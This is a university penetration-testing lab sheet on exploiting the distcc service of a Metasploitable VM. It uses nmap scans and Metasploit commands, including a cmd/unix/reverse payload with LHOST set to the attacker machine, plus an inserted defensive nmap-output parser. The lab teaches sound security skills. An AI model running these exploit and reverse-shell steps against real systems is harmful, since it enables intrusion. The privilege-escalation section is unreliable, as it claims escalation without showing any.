Metasploit Lab

The document outlines a penetration testing methodology for a Networks & Telecommunications Engineering program at Cadi Ayyad University. It details the stages of reconnaissance, scanning, exploitation, and privilege escalation, using tools like nmap and Metasploit to identify and exploit vulnerabilities. The focus is on the distcc vulnerability, guiding users through commands to gain access to a vulnerable machine.
Cadi Ayyad University
National School of Applied Sciences, Marrakech
Networks & Telecommunications Engineering Program, GRT2
Academic year: 2018-2019
Dr. Anas Abou el Kalam
Mouhsine Elallouchi

Lab (TP)
1) The reconnaissance stage:

1-1 At this stage, the pentester attempts to find IP addresses, domain names, DNS,

In our lab, we will only find the IP address of the vulnerable machine (Metasploitable), using the command:

> ifconfig

1-2 Now that we have the IP address, we test the connectivity between Kali Linux and the test machine using the command:

> ping @ip

2) The scanning stage: searching for open ports and vulnerabilities

At this stage, we focus on open ports and the services used, then we move on to vulnerability analysis. If you have Nessus, use it; otherwise (for example, when there is no internet connection) we will just use nmap, the famous tool, with a simple script, just to understand it.

Methodology:

1-1 Launch the command > nmap -sS @ip, which executes quickly and allows the scanner to check thousands of ports per second on a fast network.

1-2 After analyzing the open ports and the services used, we execute the command > nmap --script vuln @ip, which shows some risks that could harm the machine.

1-3 We choose the vulnerability that will allow us to penetrate the system. Using Nessus lets us quickly identify the most dangerous vulnerability.

That is not a big deal; in our case we will use: distcc
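As an added example that is not part of the lab sheet, the script below shows the defender's side of the scanning stage: it parses the port table from nmap's normal output and flags open services that should not be reachable from a general network, using distcc (the service this lab targets) as the watched entry. The nmap output, the host address 192.168.56.101 and the remediation note are constructed for the example; the parsing functions, `RISKY_SERVICES` and the `Finding` type are assumptions of this example, not tools from the lab.

```python
"""Flag risky open services in nmap normal output (added example, not from the lab sheet)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample of `nmap -sS -sV` output against a Metasploitable-style lab host.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 192.168.56.101
Host is up (0.00042s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1
3632/tcp open  distccd     distccd v1
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
"""

# Service names as nmap labels them, mapped to a remediation note for the report.
# Only distccd is listed because that is the service the lab discusses (assumed note text).
RISKY_SERVICES: Dict[str, str] = {
    "distccd": "distcc should only be reachable from trusted build hosts: "
               "firewall 3632/tcp and restrict clients with distccd's --allow option",
}

# One line of nmap's port table: "<port>/<proto> <state> <service> [version...]".
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*\S))?\s*$"
)


@dataclass
class PortEntry:
    port: int
    proto: str
    state: str
    service: str
    version: Optional[str]


@dataclass
class Finding:
    entry: PortEntry
    note: str


def parse_nmap_ports(text: str) -> List[PortEntry]:
    """Return every port-table row found in nmap normal output, ignoring headers and banners."""
    entries: List[PortEntry] = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            entries.append(PortEntry(int(m["port"]), m["proto"], m["state"],
                                     m["service"], m["version"]))
    return entries


def find_risky_services(text: str, risky: Dict[str, str] = RISKY_SERVICES) -> List[Finding]:
    """Flag open ports whose service name is in the watch list; closed/filtered ports are ignored."""
    return [Finding(e, risky[e.service])
            for e in parse_nmap_ports(text)
            if e.state == "open" and e.service in risky]


def report(text: str) -> str:
    """Human-readable summary of the findings, one line per exposed service."""
    findings = find_risky_services(text)
    if not findings:
        return "no watched services exposed"
    return "\n".join(f"{f.entry.port}/{f.entry.proto} {f.entry.service} "
                     f"({f.entry.version or 'unknown version'}): {f.note}" for f in findings)


if __name__ == "__main__":
    print(report(SAMPLE_NMAP_OUTPUT))
```

To use it on real output, pipe the file from `nmap -sS -sV @ip -oN scan.txt` into `report()`; extending `RISKY_SERVICES` is how a team records its own policy on which services must stay off the general network.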

3) The exploitation phase, or gaining access:

In this step, we will use a very powerful tool: Metasploit.

1-1) Start Metasploit by typing: > msfconsole (this may take a few minutes).

1-2) Search for the distcc vulnerability: > search distcc

1-3) The search presents us with some exploits to use, so we choose the exploit using the command: > use exploit/../..

N.B.:

Vulnerability - A flaw in a system that can be used as a means of attack.

Exploit - A program specifically designed to exploit a vulnerability. It contains the payload.

Payload - The code to be executed on the system once the vulnerability has been exploited.

1-4) To see the payloads that can be used with the chosen exploit, type:

> show payloads

1-5) We will use the payload cmd/unix/reverse, using the commands:

> set payload cmd/unix/reverse

> set RHOST @ip of the vulnerable machine

> set LHOST @ip of Kali

1-6) Now we exploit:

> exploit

Now we are in the vulnerable machine; to know our position, we launch the command: > whoami
4) The privilege escalation stage:

1- Press Ctrl+C to end the session.

2- Type: > exploit -j

3- Type: > whoami

Very well, now you can do whatever you want.
